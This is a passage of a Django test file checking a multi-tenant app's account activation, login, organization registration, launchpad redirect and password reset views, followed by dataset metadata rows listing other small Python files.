        response = self.unauthorized_client.get(reverse('foundation_auth_user_activation_required'))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)

    @transaction.atomic
    def test_user_activate_page_view_with_success_for_entreprenuer(self):
        """
        Unit test will take a User account which hasn't been activated,
        run the URL where activation happens, and verify the User has been
        activated.
        """
        # Convert our User's ID into an encrypted value.
        user = User.objects.get(email=TEST_USER_EMAIL)
        entrepreneur_group = Group.objects.get(id=constants.ENTREPRENEUR_GROUP_ID)
        user.is_active = False
        user.groups.add(entrepreneur_group)
        user.save()
        signer = Signer()
        id_string = str(user.id).encode()
        value = signer.sign(id_string)
        self.tenant.users.add(user)
        self.tenant.save()

        # Run test.
        url = reverse('foundation_auth_user_activation', args=[value])
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)

        # Verify.
        user = User.objects.get(email=TEST_USER_EMAIL)
        self.assertTrue(user.is_active)
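
    # NB: the activation URL carries the user's id signed with django.core.signing.Signer; these
    # tests sign the raw id the same way the emailed activation link would before hitting the view.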

    @transaction.atomic
    def test_user_activate_page_view_with_success_for_org_admin(self):
        """
        Unit test will take a User account which hasn't been activated,
        run the URL where activation happens, and verify the User has been
        activated.
        """
        # Convert our User's ID into an encrypted value.
        user = User.objects.get(email=TEST_USER_EMAIL)
        org_admin_group = Group.objects.get(id=constants.ORGANIZATION_ADMIN_GROUP_ID)
        user.is_active = False
        user.groups.add(org_admin_group)
        user.save()
        signer = Signer()
        id_string = str(user.id).encode()
        value = signer.sign(id_string)
        self.tenant.users.add(user)
        self.tenant.save()

        # Run test.
        url = reverse('foundation_auth_user_activation', args=[value])
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)

        # Verify.
        user = User.objects.get(email=TEST_USER_EMAIL)
        self.assertTrue(user.is_active)

    @transaction.atomic
    def test_user_activate_page_view_with_failed_signiture(self):
        # Run test & verify.
        response = self.unauthorized_client.get(reverse('foundation_auth_user_activation', args=[666]))
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'Failed activating this account.', response.content)

    @transaction.atomic
    def test_user_activate_page_view_with_missing_user(self):
        # Pre-configure the unit test: delete any previous users.
        items = User.objects.all()
        for item in items.all():
            item.delete()

        # Generate a signed string value for a user id that does not exist.
        signer = Signer()
        id_string = str(666).encode()
        value = signer.sign(id_string)

        # Run test & verify.
        url = reverse('foundation_auth_user_activation', args=[value])
        response = self.authorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'The page you are looking for does not exists.', response.content)

    @transaction.atomic
    def test_user_login_page_view(self):
        response = self.unauthorized_client.get(reverse('foundation_auth_user_login'))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)

    @transaction.atomic
    def test_org_reg_page_view(self):
        response = self.authorized_client.get(reverse('foundation_auth_org_registration'))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)

    @transaction.atomic
    def test_org_successful_registration_view(self):
        # Assign User to Organization.
        self.tenant.users.add(self.user)
        self.tenant.owner = self.user
        self.tenant.save()

        # Run the test and verify.
        response = self.authorized_client.get(reverse('foundation_auth_org_successful_registration'))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'Successful Registration', response.content)

    @transaction.atomic
    def test_user_launchpad_page_view_with_unauthorized(self):
        response = self.unauthorized_client.get(reverse('foundation_auth_user_launchpad'))
        self.assertEqual(response.status_code, status.HTTP_302_FOUND)
        self.assertRedirects(response, '/en/login?next=/en/launchpad')

    @transaction.atomic
    def test_user_launchpad_page_view_with_redirect_to_org_reg(self):
        response = self.authorized_client.get(reverse('foundation_auth_user_launchpad'))
        self.assertEqual(response.status_code, status.HTTP_302_FOUND)
        self.assertRedirects(response, '/en/register/organization')

    @transaction.atomic
    def test_user_password_reset_page_view(self):
        url = reverse('foundation_auth_password_reset')
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'ajax_password_reset', response.content)

    @transaction.atomic
    def test_user_password_reset_sent_page_view(self):
        url = reverse('foundation_auth_password_reset_sent')
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'ajax_login', response.content)

    @transaction.atomic
    def test_user_password_change_page_view(self):
        # Convert our User's ID into an encrypted value.
        user = User.objects.get(email=TEST_USER_EMAIL)
        signer = Signer()
        id_string = str(user.id).encode()
        value = signer.sign(id_string)

        # Run test.
        url = reverse('foundation_auth_password_reset_and_change', args=[value])
        response = self.unauthorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(len(response.content) > 1)
        self.assertIn(b'ajax_login', response.content)


class FoundationAuthViewsWithTenatSchemaTestCases(APITestCase, TenantTestCase):
    fixtures = []

    def setup_tenant(self, tenant):
        """Tenant Schema"""
        tenant.schema_name = 'galacticalliance'
        tenant.name = "Galactic Alliance of Humankind"
        tenant.has_perks = True
        tenant.has_mentors = True
        tenant.how_discovered = "Command HQ"
        tenant.how_many_served = 1

    @classmethod
    def setUpTestData(cls):
        Group.objects.bulk_create([
            Group(id=constants.ENTREPRENEUR_GROUP_ID, name="Entreprenuer",),
            Group(id=constants.MENTOR_GROUP_ID, name="Mentor",),
            Group(id=constants.ADVISOR_GROUP_ID, name="Advisor",),
            Group(id=constants.ORGANIZATION_MANAGER_GROUP_ID, name="Org Manager",),
            Group(id=constants.ORGANIZATION_ADMIN_GROUP_ID, name="Org Admin",),
            Group(id=constants.CLIENT_MANAGER_GROUP_ID, name="Client Manager",),
            Group(id=constants.SYSTEM_ADMIN_GROUP_ID, name="System Admin",),
        ])
        user = User.objects.create_user(  # Create our User.
            email=TEST_USER_EMAIL,
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )
        user.is_active = True
        user.save()
        # Setup Profiles
        # me = Me.objects.get(owner=user)
        # me.is_in_intake = True
        # me.save()

    @transaction.atomic
    def setUp(self):
        translation.activate('en')  # Set English
        super(FoundationAuthViewsWithTenatSchemaTestCases, self).setUp()
        # Initialize our test data.
        self.user = User.objects.get()
        token = Token.objects.get(user__username=TEST_USER_USERNAME)
        # Setup.
        self.unauthorized_client = TenantClient(self.tenant)
        self.authorized_client = TenantClient(self.tenant, HTTP_AUTHORIZATION='Token ' + token.key)
        self.authorized_client.login(
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )
        # Update Organization.
        self.tenant.users.add(self.user)
        self.tenant.save()

    @transaction.atomic
    def tearDown(self):
        PostalAddress.objects.delete_all()
        ContactPoint.objects.delete_all()
        Me.objects.delete_all()
        items = User.objects.all()
        for item in items.all():
            item.delete()
        items = Group.objects.all()
        for item in items.all():
            item.delete()
        # super(FoundationAuthViewsWithTenatSchemaTestCases, self).tearDown()

    @transaction.atomic
    def test_user_launchpad_page_view_with_redirect_to_dashboard(self):
        url = reverse('foundation_auth_user_launchpad')
        response = self.authorized_client.get(url)
        self.assertEqual(response.status_code, status.HTTP_302_FOUND)
        self.assertRedirects(response, 'http://galacticalliance.example.com/en/dashboard')
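
    # NB: unlike the public-schema case above (where the launchpad redirects to organization
    # registration), this tenant-schema test case expects the launchpad to land on the tenant's
    # own dashboard URL.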
| 39.916418 | 104 | 0.687107 | 1,580 | 13,372 | 5.588608 | 0.131013 | 0.029898 | 0.043035 | 0.04077 | 0.82231 | 0.803058 | 0.785391 | 0.752208 | 0.724689 | 0.662061 | 0 | 0.006214 | 0.217694 | 13,372 | 334 | 105 | 40.035928 | 0.837874 | 0.083981 | 0 | 0.716599 | 0 | 0 | 0.086336 | 0.047332 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.093117 | false | 0.048583 | 0.060729 | 0 | 0.17004 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a6b126445de1a4083f143724aa78aba3b55e1cd | 215 | py | Python | mipqctool/model/mapping/__init__.py | aueb-wim/HBPMedical-QCtool | f2cb7a23a9a1980b2797e37407e2dc5d4c236c5d | [
"Apache-2.0"
] | 8 | 2019-09-24T17:00:54.000Z | 2021-11-13T22:13:30.000Z | mipqctool/model/mapping/__init__.py | aueb-wim/HBPMedical-QCtool | f2cb7a23a9a1980b2797e37407e2dc5d4c236c5d | [
"Apache-2.0"
] | 5 | 2020-12-02T13:51:47.000Z | 2022-01-09T17:30:57.000Z | mipqctool/model/mapping/__init__.py | aueb-wim/DataQualityControlTool | 54d29aee2b54e61e94c5f2483961bf95e6977d90 | [
"Apache-2.0"
] | 2 | 2021-09-08T12:13:01.000Z | 2021-10-06T12:12:37.000Z | from mipqctool.model.mapping.correspondence import Correspondence
from mipqctool.model.mapping.mapping import Mapping
from mipqctool.model.mapping.csvdb import CsvDB
from mipqctool.model.mapping.datadb import DataDB | 53.75 | 65 | 0.874419 | 28 | 215 | 6.714286 | 0.285714 | 0.276596 | 0.382979 | 0.531915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 215 | 4 | 66 | 53.75 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3a7be399c27231c8a825b0ffc9ec68715f82775a | 62 | py | Python | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 40 | 2017-04-19T11:54:42.000Z | 2022-03-10T01:55:45.000Z | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 20 | 2017-01-11T03:11:19.000Z | 2021-04-26T04:10:13.000Z | utils/__init__.py | RyodoTanaka/Eigen3ToPython | 6bb9e44be553e996541b019c1d5aefcdbdfcb482 | [
"BSD-2-Clause"
] | 6 | 2017-06-24T18:52:53.000Z | 2022-01-19T23:48:32.000Z | import os
from .generate_eigen_pyx import generate_eigen_pyx
| 15.5 | 50 | 0.870968 | 10 | 62 | 5 | 0.6 | 0.52 | 0.64 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112903 | 62 | 3 | 51 | 20.666667 | 0.909091 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.